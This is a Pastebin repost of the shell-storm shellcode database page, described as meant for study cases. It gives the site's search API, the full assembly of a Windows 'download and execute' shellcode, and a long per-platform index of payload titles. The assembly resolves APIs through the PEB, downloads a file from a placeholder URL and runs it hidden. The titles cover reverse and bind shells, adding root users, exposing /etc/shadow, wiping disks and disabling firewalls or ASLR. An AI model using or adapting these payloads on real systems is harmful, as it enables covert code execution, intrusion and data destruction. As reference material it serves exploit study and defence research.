Advertisement
BaSs_HaXoR

Shellcodes database for study cases

Feb 3rd, 2016
1,243
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 41.22 KB | None | 0 0
  1. http://shell-storm.org/shellcode/
  2.  
  3. Shellcodes database for study cases
  4. Description
  5.  
  6. Although now the shellcodes are rarely used, this page lists some shellcodes for study cases and proposes an API to search a specific shellcode. Thanks all for the contribution of this database but we have stop to accept shellcodes because modern exploitation uses now ROP payloads.
  7.  
  8.  
  9.  
  10. API
  11.  
  12. This is very straightforward to communicate with this API. Just send a simple GET method. The "s" argument contains your keyword.
  13.  
  14. http://shell-storm.org/api/?s=<keyword>
  15. Use "*" for multiple keyword search.
  16.  
  17. /?s=<keyword1>*<keyword2>*<keyword3>
  18. The output will be like that :
  19.  
  20. <auteur 1>::::<plateforme 1>::::<shellcode title 1>::::<shellcode id 1>::::<shellcode url 1>
  21. <auteur 2>::::<plateforme 2>::::<shellcode title 2>::::<shellcode id 2>::::<shellcode url 2>
  22. <auteur 3>::::<plateforme 3>::::<shellcode title 3>::::<shellcode id 3>::::<shellcode url 3>
  23. For more information about how you can use it, read this shell-storm API python script. You can also find this API utilization in the Peda GDB project (shellcode command).
  24. ----------------------------------------------------------------
  25. (Ex.)
  26. Windows - download and execute - 124 bytes by Weiss
  27.  
  28. ;
  29. ; relocateable dynamic runtime assembly code example using hash lookup *** for IE exploits only ***
  30. ; the URLMON.DLL must already be loaded into the process space for this to work, so do not run on its own!!
  31. ;
  32. ; to test use /DTEST_CODE in ml command line
  33. ;
  34. ; URLDownLoadToFileA() / WinExec() / ExitProcess() | ExitThread()
  35. ;
  36. ; 124 bytes
  37. ;
  38. ; for testing:
  39. ;
  40. ; ml /c /coff /Cp /DTEST_CODE dexec32.asm
  41. ; link /subsystem:windows /section:.text,w dexec32.obj urlmon.lib
  42. ;
  43. ; wyse101 [at] gmail.com
  44. ;
  45. ; March 2007
  46. ;
  47. .386
  48. .model flat,stdcall
  49.  
  50. ROL_CONSTANT equ 5
  51.  
  52. mrol macro iNum:req,iBits:req
  53. exitm <(iNum shl iBits) or (iNum shr (32-iBits))>
  54. endm
  55.  
  56. mror macro iNum:req,iBits:req
  57. exitm <(iNum shr iBits) or (iNum shl (32-iBits))>
  58. endm
  59.  
  60. hashapi macro szApi
  61. local dwApi
  62.  
  63. dwApi = 0
  64.  
  65. forc x,szApi
  66. dwApi = dwApi + '&x'
  67. dwApi = mrol(dwApi,ROL_CONSTANT)
  68. endm
  69. dwApi = mrol(dwApi,ROL_CONSTANT)
  70. dw (dwApi and 0ffffh)
  71. endm
  72.  
  73. .code
  74.  
  75. assume fs:nothing
  76.  
  77. code_start:
  78. jmp load_data
  79. IFDEF TEST_CODE
  80. extern URLDownloadToFileA :proc
  81. call URLDownloadToFileA ; included when assembled with /DTEST_CODE
  82. ENDIF
  83. setup_parameters:
  84. pop edi ; offset @cmd_start
  85. xor eax,eax ; eax = 0
  86. cdq ; edx = 0
  87. ; ********************************************************************
  88. push eax ; exit code = 0
  89. ; ********************************************************************
  90. push eax ; SW_HIDE
  91. mov dl,(@cmd_end-@cmd_start)-1 ; this allows command up to 255 bytes
  92. push edi ; file name to execute
  93. ; ********************************************************************
  94. push eax ; callback routine URLDownLoadToFileA
  95. push eax ; reserved, must be zero
  96. push edi ; file name to save as
  97. add edi,edx ; get offset of @url_start-1
  98. stosb ; zero tail end
  99. mov dl,(@url_end-@url_start)-1 ; limit of 255 bytes for url
  100. push edi ; url to download file from
  101. push eax ; interface
  102. add edi,edx ; get offset of @urlmon-1
  103. stosb ; zero tail end of url
  104. ; *********************************************************************
  105. load_modules:
  106. push edi ; save current offset to hashes
  107. push 30h
  108. pop ecx
  109. mov eax,fs:[ecx] ; PEB base address
  110. mov eax,[eax+0ch] ; PEB_LDR_DATA LoaderData
  111. mov ebp,[eax+1ch] ; LIST_ENTRY InMemoryOrderModuleList
  112. scan_dll:
  113. mov ebx,[ebp+8] ; DllBase
  114. mov ebp,[ebp] ; Flink
  115. push ebp ; save
  116.  
  117. mov eax,[ebx+3ch]
  118. mov eax,[ebx+eax+78h] ; IMAGE_DIRECTORY_ENTRY_EXPORT
  119. lea esi,[ebx+eax+18h] ; offset IMAGE_EXPORT_DIRECTORY.NumberOfNames
  120. lodsd
  121. xchg eax,ecx ; ecx = NumberOfNames
  122.  
  123. lodsd
  124. add eax,ebx ; AddressOfFunctions
  125. push eax
  126.  
  127. lodsd
  128. lea edi,[eax+ebx] ; AddressOfNames
  129.  
  130. lodsd
  131. lea ebp,[eax+ebx] ; ebp = AddressOfNameOrdinals
  132. load_api:
  133. mov esi,[edi+4*ecx-4]
  134. add esi,ebx
  135. xor eax,eax
  136. cdq
  137. hash_api:
  138. lodsb
  139. add edx,eax
  140. rol edx,ROL_CONSTANT
  141. dec eax
  142. jns hash_api
  143.  
  144. mov esi,[esp+8] ; get api hashes
  145. cmp dx,word ptr[esi] ; found a match?
  146. je call_api
  147.  
  148. loop load_api
  149. pop eax ; check
  150. pop ebp ;
  151. jmp scan_dll
  152. call_api:
  153. pop eax
  154. movzx edx,word ptr [ebp+2*ecx-2]
  155. add ebx,[eax+4*edx]
  156. pop ebp ; modules
  157. pop edi ; api hashes
  158. call ebx ; call api
  159. stosw ; advance 2 bytes to next hash
  160. jmp load_modules ; do another, just keep going until ExitProcess is reached.
  161. ; *************************
  162. load_data:
  163. call setup_parameters
  164. @cmd_start:
  165. db 'file.exe',0ffh ; WinExec("file.exe",SW_HIDE);
  166. @cmd_end:
  167. @url_start:
  168. db 'http://127.0.0.1/file.exe',0ffh ; url of file to download
  169. @url_end:
  170. hashapi <URLDownloadToFileA>
  171. hashapi <WinExec>
  172. hashapi <ExitProcess>
  173. ; *********************************************************************
  174.  
  175. end code_start
  176.  
  177. ----------------------------------------------------------------
  178. AIX
  179.  
  180. Aix - execve /bin/sh - 88 bytes by Georgi Guninski
  181. Alpha
  182.  
  183. Alpha - /bin/sh - 80 bytes by Lamont Granquist
  184. Alpha - execve() - 112 bytes by n/a
  185. Alpha - setuid() - 156 bytes by n/a
  186. BSD
  187.  
  188. BSD/32bits - Passive Connection - 126 bytes by Scrippie
  189. BSD/ppc - execve(/bin/sh) - 128 bytes by Palante
  190. BSD/x86 - setreuid(geteuid(), geteuid()) and execve(/bin/sh, /bin/sh, 0) by Jihyeog Lim
  191. BSD/x86 - setuid/execve - 30 bytes by Marco Ivaldi
  192. BSD/x86 - setuid/portbind - 94 bytes by Marco Ivaldi
  193. BSD/x86 - break chroot - 45 bytes by Matias Sedalo
  194. BSD/x86 - cat /etc/master.passwd & mail root@localhost - 92 bytes by Matias Sedalo
  195. BSD/x86 - execve(/bin/sh) & setuid(0) - 29 bytes by Matias Sedalo
  196. BSD/x86 - bindshell on port 2525 - 167 bytes by beosroot
  197. BSD/x86 - execve /bin/sh Crypt /bin/sh - 49 bytes by dev0id
  198. BSD/x86 - execve(/bin/sh) - 27 bytes by n0gada
  199. Cisco
  200.  
  201. Cisco IOS - Connectback shellcode v1.0 by Gyan Chawdhary
  202. Cisco IOS - Tiny shellcode v1.0 by Gyan Chawdhary
  203. Cisco IOS - Bind shellcode v1.0 by Varun Uppal
  204. Cso
  205.  
  206. Cso/x86 - execve(/bin/sh, ..., NULL) - 43 bytes by minervini
  207. FreeBSD
  208.  
  209. Intel x86-64
  210. FreeBSD/x86-64 - execve - 28 bytes by Gitsnik
  211. FreeBSD/x86-64 - bind_tcp with passcode - 127 bytes by Gitsnik
  212. FreeBSD/x86-64 - exec(/bin/sh) Shellcode - 31 bytes by Hack'n Roll
  213. FreeBSD/x86-64 - execve /bin/sh shellcode 34 bytes by Hack'n Roll
  214. FreeBSD/x86-64 - Execve /bin/sh - Anti-Debugging by c0d3_z3r0
  215. Intel x86
  216. FreeBSD/x86 - execve /tmp/sh - 34 bytes by Claes M. Nyberg
  217. FreeBSD/x86 - execve /bin/sh 23 bytes by IZ
  218. FreeBSD/x86 - reboot(RB_AUTOBOOT) - 7 bytes by IZ
  219. FreeBSD/x86 - bind port:4883 with auth shellcode by MahDelin
  220. FreeBSD/x86 - Connect Back Port 6969 - 133 bytes by Marcetam
  221. FreeBSD/x86 - connect back /bin/sh. 81 bytes by Tosh
  222. FreeBSD/x86 - execv(/bin/sh) - 23 bytes by Tosh
  223. FreeBSD/x86 - portbind shell + fork - 111 bytes by Tosh
  224. FreeBSD/x86 - 8.0-RELEASE - //sbin/pfctl -F all Shellcode 47 Bytes by antrhacks
  225. FreeBSD/x86 - encrypted shellcode /bin/sh 48 bytes by c0d3_z3r0
  226. FreeBSD/x86 - kldload /tmp/o.o - 74 bytes by dev0id
  227. FreeBSD/x86 - /bin/sh - 23 bytes by marcetam
  228. FreeBSD/x86 - execve /bin/sh 37 bytes by preedator
  229. FreeBSD/x86 - portbind shellcode - 167 bytes by sbz
  230. FreeBSD/x86 - execve(/bin/cat & /etc/master.passwd) - 65 bytes by sm4x
  231. FreeBSD/x86 - reverse connect dl(shellcode) and execute, exit - 90 bytes by sm4x
  232. FreeBSD/x86 - reverse portbind /bin/sh - 89 bytes by sm4x
  233. FreeBSD/x86 - setuid(0)&execve({//sbin/ipf,-Faa,0},0); - 57 bytes by sm4x
  234. FreeBSD/x86 - connect back.send.exit /etc/passwd - 112 bytes by suN8Hclf
  235. FreeBSD/x86 - kill all processes - 12 bytes by suN8Hclf
  236. FreeBSD/x86 - setreuid(0, 0) & execve(pfctl -d) - 56 bytes by suN8Hclf
  237. FreeBSD/x86 - bind sh port 41254 - 115 bytes by zillion
  238. FreeBSD/x86 - reboot() - 15 bytes by zillion
  239. Hp-Ux
  240.  
  241. Hp-Ux - execve(/bin/sh) - 58 bytes by K2
  242. Irix
  243.  
  244. Irix - execve(/bin/sh -c) - 72 bytes by n/a
  245. Irix - execve(/bin/sh) - 43 bytes by n/a
  246. Irix - Bind Port - 364 bytes by scut/teso
  247. Irix - execve(/bin/sh) - 68 bytes by scut/teso
  248. Irix - stdin-read shellcode - 40 bytes by scut/teso
  249. Linux
  250.  
  251. ARM
  252. Linux/ARM - Add map in /etc/hosts file - 79 bytes Osanda Malith Jayathissa
  253. Linux/ARM - chmod("/etc/passwd", 0777) - 39 bytes gunslinger_
  254. Linux/ARM - creat("/root/pwned", 0777) - 39 bytes gunslinger_
  255. Linux/ARM - execve("/bin/sh", [], [0 vars]) - 35 bytes gunslinger_
  256. Linux/ARM - Bind Connect UDP Port 68 by Daniel Godas-Lopez
  257. Linux/ARM - Bindshell port 0x1337 by Daniel Godas-Lopez
  258. Linux/ARM - Loader Port 0x1337 by Daniel Godas-Lopez
  259. Linux/ARM - ifconfig eth0 and Assign Address by Daniel Godas-Lopez
  260. Linux/ARM - chmod(/etc/shadow, 0777) Shellcode - 35 Bytes by Florian Gaultier
  261. Linux/ARM - polymorphic chmod(/etc/shadow, 0777) - 84 Bytes by Florian Gaultier
  262. Linux/ARM - Disable ASLR Security - 102 bytes by Jonathan Salwan
  263. Linux/ARM - Kill all processes (with/without _setuid) - 28 bytes by Jonathan Salwan
  264. Linux/ARM - Polymorphic execve("/bin/sh", ["/bin/sh"], NULL); - XOR - 78 bytes by Jonathan Salwan
  265. Linux/ARM - add root user with password - 151 bytes by Jonathan Salwan
  266. Linux/ARM - execve(/bin/sh, /bin/sh, 0) - 30 bytes by Jonathan Salwan
  267. Linux/ARM - execve(/bin/sh, [0], [0 vars]) - 27 bytes by Jonathan Salwan
  268. Linux/ARM - execve(/bin/sh,NULL,0) - 31 bytes by Jonathan Salwan
  269. Linux/ARM - setuid(0) & execve(/bin/sh, /bin/sh, 0) - 38 bytes by Jonathan Salwan
  270. Linux/ARM - connect back /bin/sh. 79 bytes by Neil Klopfenstein
  271. Linux/ARM - chmod(/etc/shadow, 0777) - 41 bytes by midnitesnake
  272. Linux/ARM - execve(/bin/sh, [0], [0 vars]) - 30 bytes by midnitesnake
  273. Linux/ARM - reverse_shell(tcp,10.1.1.2,0x1337) by midnitesnake
  274. Strong ARM
  275. Linux/StrongARM - bind() portshell - 203 bytes by funkysh
  276. Linux/StrongARM - execve() - 47 bytes by funkysh
  277. Linux/StrongARM - setuid() - 20 bytes by funkysh
  278. Super-H
  279. Linux/SuperH - sh4 - Bind /bin/sh on port 31337 by Dad`
  280. Linux/SuperH - sh4 execve(/bin/sh, 0, 0) - 19 bytes by Florian Gaultier
  281. Linux/SuperH - sh4 - add root user with password - 143 bytes by Jonathan Salwan
  282. Linux/SuperH - sh4 - setuid(0) - chmod(/etc/shadow, 0666) - exit(0) - 43 bytes by Jonathan Salwan
  283. Linux/SuperH - sh4 - setuid(0) ; execve(/bin/sh, NULL, NULL) - 27 bytes by Jonathan Salwan
  284. MIPS
  285. Linux/mips - Reverse Shell Shellcode - 200 bytes by Jacob Holcomb
  286. Linux/mips - execve(/bin/sh) - 56 bytes by core
  287. Linux/mips - execve(/bin/sh, */bin/sh, 0) - 52 bytes by entropy
  288. Linux/mips - add user(UID 0) with password - 164 bytes by rigan
  289. Linux/mips - connect back shellcode (port 0x7a69) - 168 bytes by rigan
  290. Linux/mips - execve /bin/sh - 48 bytes by rigan
  291. Linux/mips - reboot() - 32 bytes by rigan
  292. Linux/mips - execve(/bin/sh,[/bin/sh],[]); - 60 bytes by vaicebine
  293. Linux/mips - port bind 4919 - 276 bytes by vaicebine
  294. PPC
  295. Linux/ppc - connect back execve /bin/sh - 240 bytes by Charles Stevenson
  296. Linux/ppc - execve /bin/sh - 60 bytes by Charles Stevenson
  297. Linux/ppc - read & exec shellcode - 32 bytes by Charles Stevenson
  298. Linux/ppc - execve /bin/sh - 112 bytes by Palante
  299. Sparc
  300. Linux/sparc - [setreuid(0,0); execve() of /bin/sh] - 64 bytes by anathema
  301. Linux/sparc - Portbind 8975/tcp - 284 bytes by killah
  302. Linux/sparc - connect back - 216 bytes by killah
  303. Linux/sparc - setreuid(0,0)&standard execve() - 72 bytes by michel kaempf
  304. Intel x86-64
  305. Linux/x86-64 - Add map in /etc/hosts file - 110 bytes by Osanda Malith Jayathissa
  306. Linux/x86-64 - Connect Back Shellcode - 139 bytes by MadMouse
  307. Linux/x86-64 - access() Egghunter - 49 bytes by Doreth.Z10
  308. Linux/x86-64 - Shutdown - 64 bytes by Keyman
  309. Linux/x86-64 - Read password - 105 bytes by Keyman
  310. Linux/x86-64 - Password Protected Reverse Shell - 136 bytes by Keyman
  311. Linux/x86-64 - Password Protected Bind Shell - 147 bytes by Keyman
  312. Linux/x86-64 - Add root - Polymorphic - 273 bytes by Keyman
  313. Linux/x86-64 - Bind TCP stager with egghunter - 157 bytes by Christophe G
  314. Linux/x86-64 - Add user and password with open,write,close - 358 bytes by Christophe G
  315. Linux/x86-64 - Add user and password with echo cmd - 273 bytes by Christophe G
  316. Linux/x86-64 - Read /etc/passwd - 82 bytes by Mr.Un1k0d3r
  317. Linux/x86-64 - shutdown -h now - 65 bytes by Osanda Malith Jayathissa
  318. Linux/x86-64 - TCP Bind 4444 with password - 173 bytes by Christophe G
  319. Linux/x86-64 - TCP reverse shell with password - 138 bytes by Andriy Brukhovetskyy
  320. Linux/x86-64 - TCP bind shell with password - 175 bytes by Andriy Brukhovetskyy
  321. Linux/x86-64 - Reads data from /etc/passwd to /tmp/outfile - 118 bytes by Chris Higgins
  322. Linux/x86-64 - shell bind TCP random port - 57 bytes by Geyslan G. Bem
  323. Linux/x86-64 - TCP bind shell - 150 bytes by Russell Willis
  324. Linux/x86-64 - Reverse TCP shell - 118 bytes by Russell Willis
  325. Linux/x86-64 - add user with passwd - 189 bytes by 0_o
  326. Linux/x86-64 - execve(/sbin/iptables, [/sbin/iptables, -F], NULL) - 49 bytes by 10n1z3d
  327. Linux/x86-64 - Execute /bin/sh - 27 bytes by Dad`
  328. Linux/x86-64 - bind-shell with netcat - 131 bytes by Gaussillusion
  329. Linux/x86-64 - connect back shell with netcat - 109 bytes by Gaussillusion
  330. Linux/x86-64 - Add root user with password - 390 bytes by Jonathan Salwan
  331. Linux/x86-64 - Disable ASLR Security - 143 bytes by Jonathan Salwan
  332. Linux/x86-64 - setuid(0) & chmod (/etc/passwd, 0777) & exit(0) - 63 byes by Jonathan Salwan
  333. Linux/x86-64 - setuid(0) & reboot - 51 bytes by Jonathan Salwan
  334. Linux/x86-64 - setreuid(0,0) execve(/bin/ash,NULL,NULL) + XOR - 85 bytes by egeektronic
  335. Linux/x86-64 - setreuid(0,0) execve(/bin/csh, [/bin/csh, NULL]) + XOR - 87 bytes by egeektronic
  336. Linux/x86-64 - setreuid(0,0) execve(/bin/ksh, [/bin/ksh, NULL]) + XOR - 87 bytes by egeektronic
  337. Linux/x86-64 - setreuid(0,0) execve(/bin/zsh, [/bin/zsh, NULL]) + XOR - 87 bytes by egeektronic
  338. Linux/x86-64 - bindshell port:4444 shellcode - 132 bytes by evil.xi4oyu
  339. Linux/x86-64 - setuid(0) + execve(/bin/sh) 49 bytes by evil.xi4oyu
  340. Linux/x86-64 - execve(/bin/sh, [/bin/sh], NULL) - 33 bytes by hophet
  341. Linux/x86-64 - execve(/bin/sh); - 30 bytes by zbt
  342. Linux/x86-64 - reboot(POWER_OFF) - 19 bytes by zbt
  343. Linux/x86-64 - sethostname() & killall - 33 bytes by zbt
  344. Intel x86
  345. Linux/x86 - Followtheleader custom execve-shellcode Encoder/Decoder - 136 bytes by Konstantinos Alexiou
  346. Linux/x86 - ROT-7 Decoder execve - 74 bytes by Stavros Metzidakis
  347. Linux/x86 - Add map in /etc/hosts file - 77 bytes by Javier Tejedor
  348. Linux/x86 - Obfuscated - chmod({passwd,shadow}) - add new root user - exec /bin/sh - 512 bytes by Ali Razmjoo
  349. Linux/x86 - setreuid() + exec /usr/bin/python - 54 bytes by Ali Razmjoo
  350. Linux/x86 - chmod + Add new root user with password + exec sh - 378 bytes by Ali Razmjoo
  351. Linux/x86 - Shell Reverse TCP Shellcode - 74 bytes by Julien Ahrens
  352. Linux/x86 - Shell Bind TCP Shellcode Port 1337 - 89 bytes by Julien Ahrens
  353. Linux/x86 - sockfd trick + dup2(0,0),dup2(0,1),dup2(0,2) + execve /bin/sh - 50 bytes by ZadYree
  354. Linux/x86 - shutdown -h now - 56 bytes by Osanda Malith Jayathissa
  355. Linux/x86 - chmod 0777 /etc/shadow (a bit obfuscated) Shellcode - 51 bytes by Osanda Malith Jayathissa
  356. Linux/x86 - /bin/nc -le /bin/sh -vp 17771 - 58 bytes by Oleg Boytsev
  357. Linux/x86 - JMP-FSTENV execve shell - 67 bytes by Paolo Stivanin
  358. Linux/x86 - shift-bit-encoder execve - 114 bytes by Shihao Song
  359. Linux/x86 - Copy /etc/passwd to /tmp/outfile - 97 bytes by Paolo Stivanin
  360. Linux/x86 - jump-call-pop execve shell - 52 bytes by Paolo Stivanin
  361. Linux/x86 - Download + chmod + exec - 108 bytes by Daniel Sauder
  362. Linux/x86 - reads /etc/passwd and sends the content to 127.1.1.1 port 12345 - 111 bytes by Daniel Sauder
  363. Linux/x86 - Multi-Egghunter by Ryan Fenno
  364. Linux/x86 - Obfuscated tcp bind shell - 112 bytes by Russell Willis
  365. Linux/x86 - Obfuscated execve /bin/sh - 30 bytes by Russell Willis
  366. Linux/x86 - egghunter shellcode by Russell Willis
  367. Linux/x86 - Reverse TCP bind shell - 92 bytes by Russell Willis
  368. Linux/x86 - Set /proc/sys/net/ipv4/ip_forward to 0 & exit() - 83 bytes by Hamid Zamani
  369. Linux/x86 - TCP bind shell - 108 bytes by Russell Willis
  370. Linux/x86 - Encrypted execve /bin/sh with uzumaki algorithm - 50 bytes by Geyslan G. Bem
  371. Linux/x86 - Mutated Execve Wget - 96 bytes by Geyslan G. Bem
  372. Linux/x86 - Mutated Fork Bomb - 15 bytes by Geyslan G. Bem
  373. Linux/x86 - Mutated Reboot - 55 bytes by Geyslan G. Bem
  374. Linux/x86 - Tiny read /etc/passwd file - 51 bytes by Geyslan G. Bem
  375. Linux/x86 - Tiny Execve sh Shellcode - 21 bytes by Geyslan G. Bem
  376. Linux/x86 - Insertion Decoder Shellcode - 33+ bytes by Geyslan G. Bem
  377. Linux/x86 - Egg Hunter Shellcode - 38 bytes by Geyslan G. Bem
  378. Linux/x86 - Tiny Shell Reverse TCP - 67 bytes by Geyslan G. Bem
  379. Linux/x86 - Tiny Shell Bind TCP Random Port - 57 bytes by Geyslan G. Bem
  380. Linux/x86 - Tiny Shell Bind TCP - 73 bytes by Geyslan G. Bem
  381. Linux/x86 - Shell Bind TCP (GetPC/Call/Ret Method) - 89 bytes by Geyslan G. Bem
  382. Linux/x86 - append /etc/passwd & exit() - 107 bytes by $andman
  383. Linux/x86 - unlink(/etc/passwd) & exit() - 35 bytes by $andman
  384. Linux/x86 - connect back&send&exit /etc/shadow - 155 byte by 0in
  385. Linux/x86 - execve read shellcode - 92 bytes by 0ut0fbound
  386. Linux/x86 - egghunt shellcode - 29 bytes by Ali Raheem
  387. Linux/x86 - nc -lvve/bin/sh -p13377 - 62 bytes by Anonymous
  388. Linux/x86 - /bin/sh Null-Free Polymorphic - 46 bytes by Aodrulez
  389. Linux/x86 - execve() Diassembly Obfuscation Shellcode - 32 bytes by BaCkSpAcE
  390. Linux/x86 - SET_IP() Connectback Shellcode - 82 bytes by Benjamin Orozco
  391. Linux/x86 - SET_PORT() portbind - 100 bytes by Benjamin Orozco
  392. Linux/x86 - netcat bindshell port 8080 - 75 bytes by Blake
  393. Linux/x86 - netcat connect back port 8080 - 76 bytes by Blake
  394. Linux/x86 - adds a root user no-passwd to /etc/passwd - 83 bytes by Bob [Dtors.net]
  395. Linux/x86 - chmod(//bin/sh ,04775); set sh +s - 31 bytes by Bob [Dtors.net]
  396. Linux/x86 - execve()/bin/ash; exit; - 34 bytes by Bob [Dtors.net]
  397. Linux/x86 - setuid(); execve(); exit(); - 44 bytes by Bob [Dtors.net]
  398. Linux/x86 - setreuid(0, 0) + execve(/bin//sh, [/bin//sh, -c, cmd], NULL); by Bunker
  399. Linux/x86 - dup2(0,0); dup2(0,1); dup2(0,2); 15 bytes by Charles Stevenson
  400. Linux/x86 - exit(1) - 7 bytes by Charles Stevenson
  401. Linux/x86 - if(read(fd,buf,512)<=2) _exit(1) else buf(); - 29 bytes by Charles Stevenson
  402. Linux/x86 - read(0,buf,2541); chmod(buf,4755); - 23 bytes by Charles Stevenson
  403. Linux/x86 - execve(/bin/dash) - 49 bytes by Chroniccommand
  404. Linux/x86 - Audio (knock knock knock) via /dev/dsp+setreuid(0,0)+execve() - 566 bytes by Cody Tubbs
  405. Linux/x86 - Surprise ! ! ! - 361 bytes by Florian Gaultier
  406. Linux/x86 - Write FS PHP Connect Back Utility Shellcode - 508 bytes by GS2008
  407. Linux/x86 - Bind TCP Port - with SO_REUSEADDR set (Avoiding SIGSEGV) - 103 bytes by Geyslan G. Bem
  408. Linux/x86 - Shell Bind TCP Random Port - 65 bytes by Geyslan G. Bem
  409. Linux/x86 - Shell Reverse TCP Shellcode - 72 bytes by Geyslan G. Bem
  410. Linux/x86 - Password Authentication portbind port 64713/tcp - 166 bytes by Gotfault Security
  411. Linux/x86 - portbind port 64713 - 86 bytes by Gotfault Security
  412. Linux/x86 - setreuid(0,0) + execve(/bin/sh, [/bin/sh, NULL]) - 33 bytes by Gotfault Security
  413. Linux/x86 - setuid(0) setgid(0) execve("/bin/sh", ["/bin/sh", NULL]) - 37 bytes by Gotfault Security
  414. Linux/x86 - Force Reboot shellcode 36 bytes by Hamza Megahed
  415. Linux/x86 - Remote Port forwarding - 87 bytes by Hamza Megahed
  416. Linux/x86 - execve /bin/sh shellcode - 23 bytes by Hamza Megahed
  417. Linux/x86 - execve-chmod 0777 /etc/shadow - 57 bytes by Hamza Megahed
  418. Linux/x86 - iptables --flush - 43 bytes by Hamza Megahed
  419. Linux/x86 - ASLR deactivation - 83 bytes by Jean Pascal Pereira
  420. Linux/x86 - chmod 666 /etc/passwd & /etc/shadow - 57 bytes by Jean Pascal Pereira
  421. Linux/x86 - execve(/bin/sh) - 28 bytes by Jean Pascal Pereira
  422. Linux/x86 - ///sbin/iptables -POUTPUT DROP - 60 bytes by John Babio
  423. Linux/x86 - /etc/init.d/apparmor teardown - 53 bytes by John Babio
  424. Linux/x86 - /usr/bin/killall snort - 46 bytes by John Babio
  425. Linux/x86 - /bin/sh polymorphic shellcode - 48 bytes by Jonathan Salwan
  426. Linux/x86 - ConnectBack with SSL connection - 422 bytes by Jonathan Salwan
  427. Linux/x86 - Disable randomize stack addresse - 106 bytes by Jonathan Salwan
  428. Linux/x86 - Ifconfig eth0 down - 51 bytes by Jonathan Salwan
  429. Linux/x86 - Kill service apache2 + pure-ftpd + sshd - 81 bytes by Jonathan Salwan
  430. Linux/x86 - Polymorphic shellcode for disable Network Card - 75 bytes by Jonathan Salwan
  431. Linux/x86 - Push Reboot() - 30 bytes by Jonathan Salwan
  432. Linux/x86 - Remote file Download - 42 bytes by Jonathan Salwan
  433. Linux/x86 - Shellcode Polymorphic chmod(/etc/shadow) & exit() - 54 bytes by Jonathan Salwan
  434. Linux/x86 - Shutdown computer - 51 bytes by Jonathan Salwan
  435. Linux/x86 - SystemV killall command - 34 bytes by Jonathan Salwan
  436. Linux/x86 - chmod() /etc/shadow 666 & exit() - 30 bytes by Jonathan Salwan
  437. Linux/x86 - execve(/bin/bash, [/bin/sh, -p], NULL) - 33 bytes by Jonathan Salwan
  438. Linux/x86 - fork() - 6 bytes by Jonathan Salwan
  439. Linux/x86 - ip6tables -F - 47 bytes by Jonathan Salwan
  440. Linux/x86 - killall5 polymorphic shellcode - 61 bytes by Jonathan Salwan
  441. Linux/x86 - netcat bindshell port 6666 - 69 bytes by Jonathan Salwan
  442. Linux/x86 - pacman -R <package> - 59 bytes by Jonathan Salwan
  443. Linux/x86 - pacman -S <package> (default package: backdoor) - 64 bytes by Jonathan Salwan
  444. Linux/x86 - polymorphic execve(/bin/bash, [/bin/sh, -p], NULL) - 57 bytes by Jonathan Salwan
  445. Linux/x86 - polymorphic forkbombe - 30 bytes by Jonathan Salwan
  446. Linux/x86 - polymorphic ip6tables -F - 71 bytes by Jonathan Salwan
  447. Linux/x86 - reboot() polymorphic shellcode - 57 bytes by Jonathan Salwan
  448. Linux/x86 - setuid(0) & chmod(/tmp,111) & exit(0) - 25 bytes by Jonathan Salwan
  449. Linux/x86 - /bin/sh - 8 bytes by JungHoon Shin
  450. Linux/x86 - add root user (r00t) with no password to /etc/passwd by Kris Katterjohn
  451. Linux/x86 - chmod(/etc/shadow, 0666) & exit() by Kris Katterjohn
  452. Linux/x86 - execve(rm -rf /) - 45 bytes by Kris Katterjohn
  453. Linux/x86 - forkbomb - 7 bytes by Kris Katterjohn
  454. Linux/x86 - ipchains -F - 40 bytes by Kris Katterjohn
  455. Linux/x86 - kill all processes - 11 bytes by Kris Katterjohn
  456. Linux/x86 - set system time to 0 & exit by Kris Katterjohn
  457. Linux/x86 - setuid(0) setgid(0) execve(echo 0 > /proc/sys/kernel/randomize_va_space) - 79 bytes by LiquidWorm
  458. Linux/x86 - DoS-Badger-Game - 6 bytes by Magnefikko
  459. Linux/x86 - SLoc-DoS shellcode - 55 bytes by Magnefikko
  460. Linux/x86 - bind sh@64533 - 97 bytes by Magnefikko
  461. Linux/x86 - chmod(/etc/shadow, 0666) - 36 bytes by Magnefikko
  462. Linux/x86 - chmod(/etc/shadow, 0777) - 29 bytes by Magnefikko
  463. Linux/x86 - execve(/bin/sh) - 25 bytes by Magnefikko
  464. Linux/x86 - execve(a->/bin/sh) - 14 bytes by Magnefikko
  465. Linux/x86 - setreud(getuid(), getuid()) & execve(/bin/sh) - 34 bytes by Magnefikko
  466. Linux/x86 - setuid(0) ^ execve(/bin/sh, 0, 0) - 27 bytes by Magnefikko
  467. Linux/x86 - setuid(0) + execve(/bin/sh,...) - 29 bytes by Marcin Ulikowski
  468. Linux/x86 - re-use of (/bin/sh) string in .rodata - 16 bytes by Marco Ivaldi
  469. Linux/x86 - setuid/portbind port 31337 TCP - 96 bytes by Marco Ivaldi
  470. Linux/x86 - stdin re-open and /bin/sh execute by Marco Ivaldi
  471. Linux/x86 - add user t00r ENCRYPT - 116 bytes by Matias Sedalo
  472. Linux/x86 - chmod 666 /etc/shadow - 41 bytes by Matias Sedalo
  473. Linux/x86 - chmod 666 shadow ENCRYPT - 75 bytes by Matias Sedalo
  474. Linux/x86 - execve /bin/sh encrypted - 58 bytes by Matias Sedalo
  475. Linux/x86 - portbind a shell in port 5074 - 92 bytes by Matias Sedalo
  476. Linux/x86 - execve /bin/sh anti-ids 40 bytes by NicatiN
  477. Linux/x86 - /bin/cp /bin/sh /tmp/katy & chmod 4555 - 126 bytes by RaiSe
  478. Linux/x86 - execve(/bin//sh/,[/bin//sh],NULL) - 22 bytes by Revenge
  479. Linux/x86 - setuid(0) + execve(/bin//sh, [/bin//sh], NULL) - 28 bytes by Revenge
  480. Linux/x86 - Port Bind 4444 ( xor-encoded ) - 152 bytes by Rick
  481. Linux/x86 - edit /etc/sudoers for full access - 86 bytes by Rick
  482. Linux/x86 - Connect Back shellcode - 90 bytes by Russell Sanford
  483. Linux/x86 - socket-proxy - 372 bytes by Russell Sanford
  484. Linux/x86 - socket-proxy - 372 bytes by Russell Sanford
  485. Linux/x86 - [setreuid()] -> [/sbin/iptables -F] -> [exit(0)] - 76 bytes by Sh3llc0d3
  486. Linux/x86 - Add root user /etc/passwd - 104 bytes by Shok
  487. Linux/x86 - iptables -F - 49 bytes by Sp4rK
  488. Linux/x86 - execve(/sbin/halt,/sbin/halt) - 27 bytes by TheWorm
  489. Linux/x86 - execve(/sbin/reboot,/sbin/reboot) - 28 bytes by TheWorm
